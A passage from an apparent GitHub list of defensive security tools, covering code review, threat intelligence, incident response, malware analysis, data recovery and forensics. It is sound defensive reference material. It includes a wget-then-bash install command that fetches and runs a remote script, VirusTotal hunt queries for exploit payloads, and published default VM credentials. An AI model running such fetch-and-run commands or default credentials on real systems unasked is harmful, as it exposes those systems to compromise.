-f <eml file> --attachments ``` ![image](https://user-images.githubusercontent.com/100603074/218200574-d9917b8c-433b-4bab-8db0-b6628b0d9424.png) *Text used from https://github.com/keraattin/EmailAnalyzer* ### [๐Ÿ”™](#tool-list)[VCG](https://github.com/nccgroup/VCG) VCG is an automated code security review tool that handles C/C++, Java, C#, VB and PL/SQL. It has a few features that should hopefully make it useful to anyone conducting code security reviews, particularly where time is at a premium: - In addition to performing some more complex checks it also has a config file for each language that basically allows you to add any bad functions (or other text) that you want to search for - It attempts to find a range of around 20 phrases within comments that can indicate broken code (โ€œToDoโ€, โ€œFixMeโ€, โ€œKludgeโ€, etc.) - It provides a nice pie chart (for the entire codebase and for individual files) showing relative proportions of code, whitespace, comments, โ€˜ToDoโ€™ style comments and bad code **Install:** You can install the pre-compiled binary here. Open the project .sln, choose "Release", and build. **Usage:** ``` STARTUP OPTIONS: (Set desired starting point for GUI. If using console mode these options will set target(s) to be scanned.) -t, --target <Filename|DirectoryName>: Set target file or directory. Use this option either to load target immediately into GUI or to provide the target for console mode. -l, --language <CPP|PLSQL|JAVA|CS|VB|PHP|COBOL>: Set target language (Default is C/C++). -e, --extensions <ext1|ext2|ext3>: Set file extensions to be analysed (See ReadMe or Options screen for language-specific defaults). -i, --import <Filename>: Import XML/CSV results to GUI. OUTPUT OPTIONS: (Automagically export results to a file in the specified format. Use XML or CSV output if you wish to reload results into the GUI later on.) -x, --export <Filename>: Automatically export results to XML file. -f, --csv-export <Filename>: Automatically export results to CSV file. -r, --results <Filename>: Automatically export results to flat text file. CONSOLE OPTIONS: -c, --console: Run application in console only (hide GUI). -v, --verbose: Set console output to verbose mode. -h, --help: Show help. ``` ### [๐Ÿ”™](#tool-list)[CyberChef](https://gchq.github.io/CyberChef/) CyberChef is a free, web-based tool that allows users to manipulate and transform data using a wide range of techniques. With CyberChef, you can perform a wide range of operations on data, such as converting between different data formats (e.g., hexadecimal, base64, ASCII), encoding and decoding data, searching and replacing text etc. The tool also includes a recipe system, which allows you to save and share data manipulation workflows with others. The tool can be used from [here](https://gchq.github.io/CyberChef/). ![image](https://user-images.githubusercontent.com/100603074/223865168-433fcd56-12e9-44a2-83aa-1531d711383d.png) *Image used from https://gchq.github.io/CyberChef/* Threat Intelligence ==================== *Tools for gathering and analyzing intelligence about current and emerging threats, and for generating alerts about potential threats.* ### [๐Ÿ”™](#tool-list)[Maltego](https://www.maltego.com/solutions/cyber-threat-intelligence/) Maltego is a commercial threat intelligence and forensics tool developed by Paterva. It is used by security professionals to gather and analyze information about domains, IP addresses, networks, and individuals in order to identify relationships and connections that might not be immediately apparent. Maltego uses a visual interface to represent data as entities, which can be linked together to form a network of relationships. It includes a range of transforms, which are scripts that can be used to gather data from various sources, such as social media, DNS records, and WHOIS data. Maltego is often used in conjunction with other security tools, such as SIEMs and vulnerability scanners, as part of a comprehensive threat intelligence and incident response strategy. You can schedule a demo [here](https://www.maltego.com/get-a-demo/). [Maltego handbook Handbook for Cyber Threat Intelligence](https://static.maltego.com/cdn/Handbooks/Maltego-Handbook-for-Cyber-Threat-Intelligence.pdf) ![image](https://user-images.githubusercontent.com/100603074/210655712-e1409206-de1d-4601-88a5-f5a6ac3928c7.png) *Image used from https://www.maltego.com/reduce-your-cyber-security-risk-with-maltego/* ### [๐Ÿ”™](#tool-list)[MISP](https://www.misp-project.org/) MISP (short for Malware Information Sharing Platform) is an open-source platform for sharing, storing, and correlating Indicators of Compromise (IOCs) of targeted attacks, threats, and malicious activity. MISP includes a range of features, such as real-time sharing of IOCs, support for multiple formats, and the ability to import and export data to and from other tools. It also provides a RESTful API and various data models to facilitate the integration of MISP with other security systems. In addition to its use as a threat intelligence platform, MISP is also used for incident response, forensic analysis, and malware research. **Install:** ```bash # Kali wget -O /tmp/misp-kali.sh https://raw.githubusercontent.com/MISP/MISP/2.4/INSTALL/INSTALL.sh && bash /tmp/misp-kali.sh # Ubuntu 20.04.2.0-server wget -O /tmp/INSTALL.sh https://raw.githubusercontent.com/MISP/MISP/2.4/INSTALL/INSTALL.sh bash /tmp/INSTALL.sh ``` Full installation instructions can be found [here](https://misp.github.io/MISP/). **Usage:** MISP documentation can be found [here](https://www.misp-project.org/documentation/). [MISP user guide](https://github.com/MISP/misp-book) [MISP Training Cheat sheet](https://www.misp-project.org/misp-training/cheatsheet.pdf) ![image](https://user-images.githubusercontent.com/100603074/210655743-b7fd5ab0-a106-4277-815d-c674525a9a91.png) *Image used from http://www.concordia-h2020.eu/blog-post/integration-of-misp-into-flowmon-ads/* ### [๐Ÿ”™](#tool-list)[ThreatConnect](https://threatconnect.com/threat-intelligence-platform/) ThreatConnect is a threat intelligence platform that helps organizations aggregate, analyze, and act on threat data. It is designed to provide a single, unified view of an organization's threat landscape and enable users to collaborate and share information about threats. The platform includes a range of features for collecting, analyzing, and disseminating threat intelligence, such as a customizable dashboard, integration with third-party data sources, and the ability to create custom reports and alerts. It is intended to help organizations improve their security posture by providing them with the information they need to identify, prioritize, and respond to potential threats. You can request a demo from [here](https://threatconnect.com/request-a-demo/). [ThreatConnect for Threat Intel Analysts - PDF](https://threatconnect.com/wp-content/uploads/2022/12/Intel-Analysts-Datasheet.pdf) ![image](https://user-images.githubusercontent.com/100603074/210655770-4413ead0-6216-47fe-a933-cbe0be9f86a1.png) *Image used from https://threatconnect.com/threat-intelligence-platform/* ### [๐Ÿ”™](#tool-list)[Adversary Emulation Library](https://github.com/center-for-threat-informed-defense/adversary_emulation_library) This is a library of adversary emulation plans to enable you to evaluate your defensive capabilities against real-world threats. Emulation plans are an essential component for organizations looking to prioritize defenses against behavior from specific threats. The TTPs outlined in this resource can be used to design specific threat emulation activities to test your organisations defenses against specific threat actors. Visit the resource [here](https://github.com/center-for-threat-informed-defense/adversary_emulation_library). **Example (sandworm)** - [Sandworm Emulated Software Source Code](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/sandworm/Resources) - [Sandworm Detection Scenario Walkthrough](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/sandworm/Emulation_Plan/Scenario_1) - [Sandworm Intelligence Summary](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/master/sandworm/Intelligence_Summary/Intelligence_Summary.md) ![image](https://user-images.githubusercontent.com/100603074/223865356-c4d491c3-edba-40d6-80b2-5c41029bddfd.png) *Image used from https://github.com/center-for-threat-informed-defense/adversary_emulation_library* Incident Response Planning ==================== *Tools for creating and maintaining an incident response plan, including templates and best practices for responding to different types of incidents.* ### [๐Ÿ”™](#tool-list)[NIST](https://www.nist.gov/cyberframework) The NIST Cybersecurity Framework (CSF) is a framework developed by the National Institute of Standards and Technology (NIST) to help organizations manage cybersecurity risks. It provides a set of guidelines, best practices, and standards for implementing and maintaining a robust cybersecurity program. The framework is organized around five core functions: Identify, Protect, Detect, Respond, and Recover. These functions provide a structure for understanding and addressing the various components of cybersecurity risk. The CSF is designed to be flexible and adaptable, and it can be customized to fit the specific needs and goals of an organization. It is intended to be used as a tool for improving an organization's cybersecurity posture and for helping organizations better understand and manage their cybersecurity risks. **Useful Links:** [NIST Quickstart Guide](https://csrc.nist.gov/Projects/cybersecurity-framework/nist-cybersecurity-framework-a-quick-start-guide) [Framework for Improving Critical Infrastructure Cybersecurity](https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf) [Data Breach Response: A Guide for Business](https://www.ftc.gov/business-guidance/resources/data-breach-response-guide-business) [NIST Events and Presentations](https://www.nist.gov/cyberframework/events-and-presentations) [Twitter - @NISTcyber](https://www.twitter.com/NISTcyber) ![image](https://user-images.githubusercontent.com/100603074/210655795-f809707f-fb3e-4df9-b07d-c4fa0392f020.png) *Image used from https://www.dell.com/en-us/blog/strengthen-security-of-your-data-center-with-the-nist-cybersecurity-framework/* ### [๐Ÿ”™](#tool-list)Incident Response Plan An incident response plan is a set of procedures that a company puts in place to manage and mitigate the impact of a security incident, such as a data breach or a cyber attack. The theory behind an incident response plan is that it helps a company to be prepared for and respond effectively to a security incident, which can minimize the damage and reduce the chances of it happening again in the future. There are several reasons why businesses need an incident response plan: 1. **To minimize the impact of a security incident:** An incident response plan helps a company to identify and address the source of a security incident as quickly as possible, which can help to minimize the damage and reduce the chances of it spreading. 2. **To meet regulatory requirements:** Many industries have regulations that require companies to have an incident response plan in place. For example, the Payment Card Industry Data Security Standard (PCI DSS) requires merchants and other organizations that accept credit cards to have an incident response plan. 3. **To protect reputation:** A security incident can damage a company's reputation, which can lead to a loss of customers and revenue. An incident response plan can help a company to manage the situation and minimize the damage to its reputation. 4. **To reduce the cost of a security incident:** The cost of a security incident can be significant, including the cost of remediation, legal fees, and lost business. An incident response plan can help a company to minimize these costs by providing a roadmap for responding to the incident. **Useful Links:** [National Cyber Security Centre - Incident Response overview](https://www.ncsc.gov.uk/collection/incident-management/incident-response) [SANS - Security Policy Templates](https://www.sans.org/information-security-policy/) [SANS - Incident Handler's Handbook](https://www.sans.org/white-papers/33901/) [FRSecure - Incident Response Plan Template](https://frsecure.com/incident-response-plan-template/) [Cybersecurity and Infrastructure Security Agency - CYBER INCIDENT RESPONSE](https://www.cisa.gov/cyber-incident-response) [FBI - Incident Response Policy](https://www.fbi.gov/file-repository/incident-response-policy.pdf/view) ![image](https://user-images.githubusercontent.com/100603074/210656422-d75791ae-797b-4135-bbd5-8b84335892ba.png) *Image used from https://www.ncsc.gov.uk/collection/incident-management/incident-response* ### [๐Ÿ”™](#tool-list)Ransomware Response Plan Ransomware is a type of malicious software that encrypts a victim's files. The attackers then demand a ransom from the victim to restore access to the files; hence the name ransomware. The theory behind a ransomware response plan is that it helps a company to be prepared for and respond effectively to a ransomware attack, which can minimize the impact of the attack and reduce the chances of it happening again in the future. There are several reasons why businesses need a ransomware response plan: 1. **To minimize the impact of a ransomware attack:** A ransomware response plan helps a company to identify and address a ransomware attack as quickly as possible, which can help to minimize the damage and reduce the chances of the ransomware spreading to other systems. 2. **To protect against data loss:** Ransomware attacks can result in the loss of important data, which can be costly and disruptive for a business. A ransomware response plan can help a company to recover from an attack and avoid data loss. 3. **To protect reputation:** A ransomware attack can damage a company's reputation, which can lead to a loss of customers and revenue. A ransomware response plan can help a company to manage the situation and minimize the damage to its reputation. 4. **To reduce the cost of a ransomware attack:** The cost of a ransomware attack can be significant, including the cost of remediation, legal fees, and lost business. A ransomware response plan can help a company to minimize these costs by providing a roadmap for responding to the attack. **Useful Links:** [National Cyber Security Centre - Mitigating malware and ransomware attacks](https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks) [NIST - Ransomware Protection and Response](https://csrc.nist.gov/Projects/ransomware-protection-and-response) [Cybersecurity and Infrastructure Security Agency - Ransomware Guide](https://www.cisa.gov/stopransomware/ransomware-guide) [Microsoft Security - Ransomware response](https://www.microsoft.com/en-us/security/blog/2019/12/16/ransomware-response-to-pay-or-not-to-pay/) [Blog - Creating a Ransomware Response Plan](https://www.msp360.com/resources/blog/designing-a-ransomware-response-plan/) ![image](https://user-images.githubusercontent.com/100603074/210655863-d4044516-022a-4f6b-afaa-cf375c1f01b4.png) *Image used from https://csrc.nist.gov/Projects/ransomware-protection-and-response* ### [๐Ÿ”™](#tool-list)[Incident Response Reference Guide](https://info.microsoft.com/rs/157-GQE-382/images/EN-US-CNTNT-emergency-doc-digital.pdf) This is a โ€œfirst aidโ€ style of guidance for cybersecurity to help you prepare for a crisis and limit the potential damage in a crisis. This includes tips and guidance for technical, operational, legal, and communications aspects of a major cybersecurity incident. **Key Takeaways** - **Preparation pays off** โ€“ Preparing for a major incident can reduce damage to the organization, as well as reduce incident cost and management difficulty. - **Operationalize your incident management processes** โ€“ Managing major cybersecurity incidents must be part of standard business risk management processes. - **Coordination is critical** โ€“ Effective cybersecurity incident management requires collaboration and coordination of technical, operations, communications, legal, and governance functions. - **Stay calm and do no harm in an incident** โ€“ Overreacting can be as damaging as underreacting. You can read the paper [here](https://info.microsoft.com/rs/157-GQE-382/images/EN-US-CNTNT-emergency-doc-digital.pdf). ![image](https://user-images.githubusercontent.com/100603074/223865803-a026ad87-00dd-4458-bf17-416a091566dd.png) *Image used from https://info.microsoft.com/rs/157-GQE-382/images/EN-US-CNTNT-emergency-doc-digital.pdf* ### [๐Ÿ”™](#tool-list)[Awesome Incident Response](https://github.com/meirwah/awesome-incident-response) A curated list of tools and resources for security incident response, aimed to help security analysts and [DFIR](https://www.acronymfinder.com/Digital-Forensics%2c-Incident-Response-%28DFIR%29.html) teams. This is a great resource full of links for different aspects of incident response, including: - Adversary Emulation - All-In-One Tools - Books - Communities - Disk Image Creation Tools Visit the resource [here](https://github.com/meirwah/awesome-incident-response). ![image](https://user-images.githubusercontent.com/100603074/223865479-b54a2f98-0c2c-4bf1-8072-58ea7bfe4fb0.png) *Image used from https://github.com/meirwah/awesome-incident-response* Malware Detection and Analysis ==================== *Tools for detecting and analyzing malware, including antivirus software and forensic analysis tools.* ### [๐Ÿ”™](#tool-list)[VirusTotal](https://www.virustotal.com/gui/home/search) VirusTotal is a website and cloud-based tool that analyzes and scans files, URLs, and software for viruses, worms, and other types of malware. When a file, URL, or software is submitted to VirusTotal, the tool uses various antivirus engines and other tools to scan and analyze it for malware. It then provides a report with the results of the analysis, which can help security professionals and blue teams identify and respond to potential threats. VirusTotal can also be used to check the reputation of a file or URL, and to monitor for malicious activity on a network. Visit [https://www.virustotal.com/gui/home/search](https://www.virustotal.com/gui/home/search) **Usage:** ```bash # Recently created documents with macros embedded, detected at least by 5 AVs (type:doc OR type: docx) tag:macros p:5+ generated:30d+ # Excel files bundled with powershell scripts and uploaded to VT for the last 10 days (type:xls OR type:xlsx) tag:powershell fs:10d+ # Follina-like exploit payloads entity:file magic:"HTML document text" tag:powershell have:itw_url # URLs related to specified parent domain/subdomain with a specific header in the response entity:url header_value:"Apache/2.4.41 (Ubuntu)" parent_domain:domain.org # Suspicious URLs with a specific HTML title entity:url ( title:"XY Company" or title:"X.Y. Company" or title:"XYCompany" ) p:5+ ``` Full documentation can be found [here](https://support.virustotal.com/hc/en-us/categories/360000162878-Documentation). [VT INTELLIGENCE CHEAT SHEET](https://storage.googleapis.com/vtpublic/reports/VTI%20Cheatsheet.pdf) ![image](https://user-images.githubusercontent.com/100603074/210655958-9a39783e-637e-46a3-a80c-4c64b389de60.png) *Image used from https://www.virustotal.com/gui/home/search* ### [๐Ÿ”™](#tool-list)[IDA](https://hex-rays.com/ida-free/) IDA (Interactive Disassembler) is a powerful tool used to reverse engineer and analyze compiled and executable code. It can be used to examine the inner workings of software, including malware, and to understand how it functions. IDA allows users to disassemble code, decompile it into a higher-level programming language, and view and edit the resulting source code. This can be useful for identifying vulnerabilities, analyzing malware, and understanding how a program works. IDA can also be used to generate graphs and charts that visualize the structure and flow of code, which can make it easier to understand and analyze. **Install:** Download IDA from [here](https://hex-rays.com/ida-free/#download). **Usage:** [IDA Practical Cheatsheet](https://github.com/AdamTaguirov/IDA-practical-cheatsheet) [IDAPython cheatsheet](https://gist.github.com/icecr4ck/7a7af3277787c794c66965517199fc9c) [IDA Pro Cheatsheet](https://hex-rays.com/products/ida/support/freefiles/IDA_Pro_Shortcuts.pdf) ![image](https://user-images.githubusercontent.com/100603074/210655977-e52a66eb-7698-4769-b002-a9d6f1503b85.png) *Image used from https://www.newton.com.tw/wiki/IDA%20Pro* ### [๐Ÿ”™](#tool-list)[Ghidra](https://ghidra-sre.org/) Ghidra is a free, open-source software reverse engineering tool developed by the National Security Agency (NSA). It is used to analyze compiled and executable code, including malware. Ghidra allows users to disassemble code, decompile it into a higher-level programming language, and view and edit the resulting source code. This can be useful for identifying vulnerabilities, analyzing malware, and understanding how a program works. Ghidra also includes a range of features and tools that support SRE tasks, such as debugging, code graphing, and data visualization. Ghidra is written in Java and is available for Windows, MacOS, and Linux. **Install:** 1. Download the latest release from [here](https://github.com/NationalSecurityAgency/ghidra/releases). 2. Extract the zip Full installation and error fix information can be found [here](https://ghidra-sre.org/InstallationGuide.html#Install). **Usage:** 1. Navigate to the unzipped folder ```bash # Windows ghidraRun.bat # Linux ./ghidraRun ``` If Ghidra failed to launch, see the [Troubleshooting](https://ghidra-sre.org/InstallationGuide.html#Troubleshooting) link. ![image](https://user-images.githubusercontent.com/100603074/210656000-9b31d5fc-7b95-447e-94ed-94aef602de46.png) *Image used from https://www.malwaretech.com/2019/03/video-first-look-at-ghidra-nsa-reverse-engineering-tool.html* ### [๐Ÿ”™](#tool-list)[decode-vbe](https://github.com/DidierStevens/DidierStevensSuite/blob/master/decode-vbe.py) Script Encoding was introduced by Microsoft (long ago) to prevent people from being able to read, understand and alter VBScript files. Encoded scripts are unreadable but still able to execute, making it a popular mechanism with threat actors looking to hide their malicious code, IOCs, hardcoded C2 domains etc whilst still being able to achieve execution. The decode-vbe script can be used to convert encoded VBE files back to plaintext for analysis. Nice blog about VBE files [here](https://bromiley.medium.com/malware-monday-vbscript-and-vbe-files-292252c1a16). **Install:** ```bash git clone https://github.com/DidierStevens/DidierStevensSuite/ cd DidierStevensSuite ``` **Usage:** ```bash # Decode literal string decode-vbe.py "##@~^DgAAAA==\ko$K6,JCV^GJqAQAAA==^#~@" # Decode hexadecimal (prefix #h#) decode-vbe.py #h#23407E5E4467414141413D3D5C6B6F244B362C4A437F565E474A7141514141413D3D5E237E40 # Decode base64 (prefix #b#) decode-vbe.py #b#I0B+XkRnQUFBQT09XGtvJEs2LEpDf1ZeR0pxQVFBQUE9PV4jfkA= ``` ### [๐Ÿ”™](#tool-list)[pafish](https://github.com/a0rtega/pafish) Pafish is a testing tool that uses different techniques to detect virtual machines and malware analysis environments in the same way that malware families do. The project is free and open source; the code of all the anti-analysis techniques is publicly available. Pafish executables for Windows (x86 32-bit and 64-bit) can be downloaded from the [releases page](https://github.com/a0rtega/pafish/releases). **Install: (Build)** Pafish is written in C and can be built with Mingw-w64 and make. The wiki page "[How to build](https://github.com/a0rtega/pafish/wiki/How-to-build)" contains detailed instructions. **Usage:** ```bash pafish.exe ``` ![image](https://user-images.githubusercontent.com/100603074/218870623-4c149ec7-2002-42ea-9c24-0d35f562bb8c.png) *Image used from https://github.com/a0rtega/pafish* ### [๐Ÿ”™](#tool-list)[lookyloo](https://github.com/Lookyloo/lookyloo) Lookyloo is a web interface that captures a webpage and then displays a tree of the domains, that call each other. Use Lookyloo to map the journey a website page takes - from entering the initial URL address to the various redirects to third-party affiliations. **Install:** ```bash git clone https://github.com/Lookyloo/lookyloo.git cd lookyloo poetry install echo LOOKYLOO_HOME="'`pwd`'" > .env ``` Full installation instructions can be found [here](https://www.lookyloo.eu/docs/main/install-lookyloo.html). **Usage:** Once installed and running, lookyloo can be operated via the web interface hosted locally. ![image](https://user-images.githubusercontent.com/100603074/218870701-24d0b7c1-50d9-4b7d-9b9d-b76c98b4e10f.png) *Image used from https://www.lookyloo.eu/* ### [๐Ÿ”™](#tool-list)[YARA](https://github.com/virustotal/yara) YARA is a tool aimed at (but not limited to) helping malware researchers to identify and classify malware samples. With YARA you can create descriptions of malware families (or whatever you want to describe) based on textual or binary patterns. Each description, a.k.a rule, consists of a set of strings and a boolean expression which determine its logic. **Install:** ```bash tar -zxf yara-4.2.0.tar.gz cd yara-4.2.0 ./bootstrap.sh sudo apt-get install automake libtool make gcc pkg-config git clone https://github.com/VirusTotal/yara cd yara ./bootstrap.sh ./configure make sudo make install ``` Full installation instructions can be found [here](https://yara.readthedocs.io/en/stable/gettingstarted.html#compiling-and-installing-yara). **Usage:** ```bash # Apply rule in /foo/bar/rules to all files in the current directory yara /foo/bar/rules . # Scan all files in the /foo directory and its subdirectories: yara /foo/bar/rules -r /foo ``` Nice YARA cheatsheet [here](https://github.com/mattnotmax/DFIR-notes/blob/master/cheatsheet_yara.md). ![image](https://user-images.githubusercontent.com/100603074/218871209-da726de1-1563-40b4-857c-3234f7415fdb.png) *Image used from https://virustotal.github.io/yara/* ### [๐Ÿ”™](#tool-list)[Cuckoo Sandbox](https://cuckoosandbox.org/) Cuckoo is an open source automated malware analysis system. Itโ€™s used to automatically run and analyze files and collect comprehensive analysis results that outline what the malware does while running inside an isolated operating system. It can retrieve the following type of results: - Traces of calls performed by all processes spawned by the malware. - Files being created, deleted and downloaded by the malware during its execution. - Memory dumps of the malware processes. - Network traffic trace in PCAP format. - Screenshots taken during the execution of the malware. - Full memory dumps of the machines. **Install:** For installation follow the docs [here](https://cuckoo.readthedocs.io/en/latest/installation/). **Usage:** For usage follow the docs [here](https://cuckoo.readthedocs.io/en/latest/usage/). ### [๐Ÿ”™](#tool-list)[radare2](https://github.com/radareorg/radare2) Radare2 provides a set of libraries, tools and plugins to ease reverse engineering tasks. r2 is a featureful low-level command-line tool with support for scripting. r2 can edit files on local hard drives, view kernel memory, and debug programs locally or via a remote gdb server. r2's wide architecture support allows you to analyze, emulate, debug, modify, and disassemble any binary. **Install:** ```bash git clone https://github.com/radareorg/radare2 radare2/sys/install.sh ``` **Usage:** ```bash $ r2 /bin/ls # open the binary in read-only mode > aaa # same as r2 -A, analyse the binary > afl # list all functions (try aflt, aflm) > px 32 # print 32 byte hexdump current block > s sym.main # seek to the given offset (by flag name, number, ..) > f~foo # filter flags with ~grep (same as |grep) > iS;is # list sections and symbols (same as rabin2 -Ss) > pdf; agf # print function and show control-flow-graph in ascii-art > oo+;w hello # reopen in rw mode and write a string in the current offset > ?*~... # interactive filter all command help messages > q # quit ``` Great usage book [here](https://book.rada.re/). ![image](https://user-images.githubusercontent.com/100603074/218871325-90800880-ee58-4a61-9372-fa9cb09f6bf3.png) *Image used from https://github.com/radareorg/radare2* ### [๐Ÿ”™](#tool-list)[dnSpy](https://github.com/dnSpy/dnSpy) dnSpy is a debugger and .NET assembly editor. You can use it to edit and debug assemblies. Main features: - Debug .NET and Unity assemblies - Edit .NET and Unity assemblies **Install: (Build)** ```bash git clone --recursive https://github.com/dnSpy/dnSpy.git cd dnSpy ./build.ps1 -NoMsbuild ``` **Usage:** ```bash dnSpy.exe ``` Nice tutorial page [here](https://7d2dsdx.github.io/Tutorials/index.html?StartingdnSpy.html). ![image](https://user-images.githubusercontent.com/100603074/218871411-7eb20cb7-f2e8-4d29-98a9-d5820a138c8e.png) *Image used from https://7d2dsdx.github.io/Tutorials/index.html?StartingdnSpy.html* ### [๐Ÿ”™](#tool-list)[malware-traffic-analysis.net](https://www.malware-traffic-analysis.net/) This is a site with over 2,200 blog entries about malicious network traffic. Almost every post on the site has pcap files or malware samples (or both). The site also contains a number of traffic analysis exercises, including technical blog posts outlining techniques being used by threat actors. **Usage:** Visit [https://www.malware-traffic-analysis.net/](https://www.malware-traffic-analysis.net/). ![image](https://user-images.githubusercontent.com/100603074/218871486-f782e3f1-fcea-4e68-a99b-235146490b84.png) *Image used from https://www.malware-traffic-analysis.net/* Data Recovery ==================== *Tools for recovering data from damaged or corrupted systems and devices.* ### [๐Ÿ”™](#tool-list)[Recuva](https://www.ccleaner.com/recuva) Recuva is a data recovery tool that can be used to recover deleted files from your computer. It is often used to recover deleted files that may contain valuable information, such as deleted logs or documents that could be used to investigate a security incident. Recuva can recover files from hard drives, USB drives, and memory cards, and it is available for Windows and Mac operating systems. **Install:** You can download the tool from [here](https://www.ccleaner.com/recuva). **Usage:** Nice step by step [guide](https://toolbox.iskysoft.com/data-recovery-tips/recuva-windows-10.html). ![image](https://user-images.githubusercontent.com/100603074/210668891-58312f55-d4d0-4f77-9cd6-f716bbdb5b44.png) *Image used from https://www.softpedia.com/blog/recuva-explained-usage-video-and-download-503681.shtml* ### [๐Ÿ”™](#tool-list)[Extundelete](https://extundelete.sourceforge.net/) Extundelete is a utility that can be used to recover deleted files from an ext3 or ext4 file system. It works by searching the file system for blocks of data that used to belong to a file, and then attempting to recreate the file using those blocks of data. It is often used to recover important files that have been accidentally or maliciously deleted. **Install:** You can download the tool from [here](https://sourceforge.net/project/platformdownload.php?group_id=260221). **Usage:** ```bash # Prints information about the filesystem from the superblock. --superblock # Attemps to restore the file which was deleted at the given filename, called as "--restore-file dirname/filename". --restore-file path/to/deleted/file # Restores all files possible to undelete to their names before deletion, when possible. Other files are restored to a filename like "file.NNNN". --restore-all ``` Full usage information can be found [here](https://extundelete.sourceforge.net/options.html). ![image](https://user-images.githubusercontent.com/100603074/210669234-0d2d4920-7856-4731-b81c-3d7132f752ad.png) *Image used from https://theevilbit.blogspot.com/2013/01/backtrack-forensics-ext34-file-recovery.html* ### [๐Ÿ”™](#tool-list)[TestDisk](https://www.cgsecurity.org/wiki/TestDisk_Download) TestDisk is a free and open-source data recovery software tool that is designed to help recover lost partitions and make non-booting disks bootable again. It is useful for both computer forensics and data recovery. It can be used to recover data that has been lost due to a variety of reasons, such as accidental deletion, formatting, or corruption of the partition table. TestDisk can also be used to repair damaged boot sectors, recover deleted partitions, and recover lost files. It supports a wide range of file systems, including FAT, NTFS, and ext2/3/4, and can be used to recover data from disks that are damaged or formatted with a different file system than the one they were originally created with. **Install:** You can download the tool from [here](https://www.cgsecurity.org/wiki/TestDisk_Download). **Usage:** Full usage examples [here](https://www.cgsecurity.org/wiki/Data_Recovery_Examples). [Step by step guide](https://www.cgsecurity.org/wiki/TestDisk_Step_By_Step) [TestDisk Documentation PDF - 60 Pages](https://www.cgsecurity.org/testdisk.pdf) ![image](https://user-images.githubusercontent.com/100603074/210668956-4ed75998-bd6d-48cf-a2e7-dfa75656eece.png) *Image used from https://www.cgsecurity.org/wiki/* Digital Forensics ==================== *Tools for conducting forensic investigations of digital devices and systems, including tools for collecting and analyzing evidence.* ### [๐Ÿ”™](#tool-list)[SANS SIFT](https://www.sans.org/tools/sift-workstation/) SANS SIFT (SANS Investigative Forensic Toolkit) is a powerful toolkit for forensic analysis and incident response. It is a collection of open source and commercial tools that can be used to perform forensic analysis on a wide range of systems, including Windows, Linux, and Mac OS X. The SANS SIFT kit is designed to be run on a forensic workstation, which is a specialized computer that is used to perform forensic analysis on digital evidence. The SANS SIFT kit is particularly useful for blue teamers, as it provides a wide range of tools and resources that can be used to investigate incidents, respond to threats, and perform forensic analysis on compromised systems. **Install:** 1. Visit [https://www.sans.org/tools/sift-workstation/](https://www.sans.org/tools/sift-workstation/). 2. Click the 'Login to Download' button and input (or create) your SANS Portal account credentials to download the virtual machine. 3. Once you have booted the virtual machine, use the credentials below to gain access. ``` Login = sansforensics Password = forensics ``` **Note:** *Use to elevate privileges to root while mounting disk images.* Additional install options [here](https://www.sans.org/tools/sift-workstation/). **Usage:** ```bash # Registry Parsing - Regripper rip.pl -r <HIVEFILE> -f <HIVETYPE> # Recover deleted registry keys deleted.pl <HIVEFILE> # Mount E01 Images ewfmount image.E01 mountpoint mount -o # Stream Extraction bulk_extractor <options> -o output_dir ``` Full usage guide [here](https://www.sans.org/posters/sift-cheat-sheet/). ![image](https://user-images.githubusercontent.com/100603074/210668984-bdec731b-ce80-4c3b-9696-9431dd77f9b0.png) *Image used from https://securityboulevard.com/2020/08/how-to-install-sift-workstation-and-remnux-on-the-same-system-for-forensics-and-malware-analysis/* ### [๐Ÿ”™](#tool-list)[The Sleuth Kit](https://sleuthkit.org/sleuthkit/) The Sleuth Kit is a collection of command line tools that can be used to analyze disk images and recover files from them. It is primarily used by forensic investigators to examine digital evidence after a computer has been seized or an image of a disk has been made. It can be useful because it can help understand what happened during a security incident and identify any malicious activity. The tools in The Sleuth Kit can be used to extract deleted files, analyze disk partition structures, and examine the file system for evidence of tampering or unusual activity. **Install:** Download tool from [here](https://sleuthkit.org/sleuthkit/download.php). **Usage:** Link to [documentation](https://sleuthkit.org/sleuthkit/docs.php). ![image](https://user-images.githubusercontent.com/100603074/210669006-6dfab59d-b50e-49db-b390-b9ef27cab6fe.png) *Image used from http://www.effecthacking.com/2016/09/the-sleuth-kit-digital-forensic-tool.html* ### [๐Ÿ”™](#tool-list)[Autopsy](https://www.autopsy.com/) Autopsy is a digital forensics platform and graphical interface to The Sleuth Kit and other digital forensics tools. It is used by law enforcement, military, and corporate examiners to investigate what happened on a computer. You can use it to analyze disk images and recover files, as well as to identify system and user activity. Autopsy is used by "blue teams" (the cybersecurity professionals who defend organizations against attacks) to conduct forensic analysis and incident response. It can help blue teams understand the nature and scope of an attack, and identify any malicious activity that may have occurred on a computer or network. **Install:** Download the tool from [here](https://www.autopsy.com/download/). **Usage:** [Autopsy User Guide](http://sleuthkit.org/autopsy/docs/user-docs/4.19.3//) [SANS - Introduction to using the AUTOPSY Forensic Browser](https://www.sans.org/blog/a-step-by-step-introduction-to-using-the-autopsy-forensic-browser/) ![image](https://user-images.githubusercontent.com/100603074/210669037-449e7790-85c8-4b8c-97b9-2b46a1ea6e61.png) *Image used from https://www.kitploit.com/2014/01/autopsy-digital-investigation-analysis.html* Security Awareness Training ==================== *Tools for training employees and other users on how to recognize and prevent potential security threats.* ### [๐Ÿ”™](#tool-list)[TryHackMe](https://tryhackme.com/dashboard) TryHackMe is a platform that offers a variety of virtual machines, known as "rooms," which are designed to teach cybersecurity concepts and skills through hands-on learning. These rooms are interactive and gamified, allowing users to learn about topics such as web vulnerabilities, network security, and cryptography by solving challenges and completing tasks. The platform is often used for security awareness training, as it provides a safe and controlled environment for users to practice their skills and learn about different types of cyber threats and how to defend against them. Visit [https://tryhackme.com/](https://tryhackme.com/) and create an account. [TryHackMe - Getting Started Guide](https://docs.tryhackme.com/docs/teaching/teaching-getting-started/) **Useful links:** [Pre-Security Learning Path](https://tryhackme.com/path-action/presecurity/join) [introduction to Cyber Security Learning Path](https://tryhackme.com/path-action/introtocyber/join) Visit the [hacktivities](https://tryhackme.com/hacktivities) tab for a full list of available rooms and modules. ![image](https://user-images.githubusercontent.com/100603074/210669062-dba079b7-a677-4b7a-ac99-6892ba894ac8.png) *Image used from 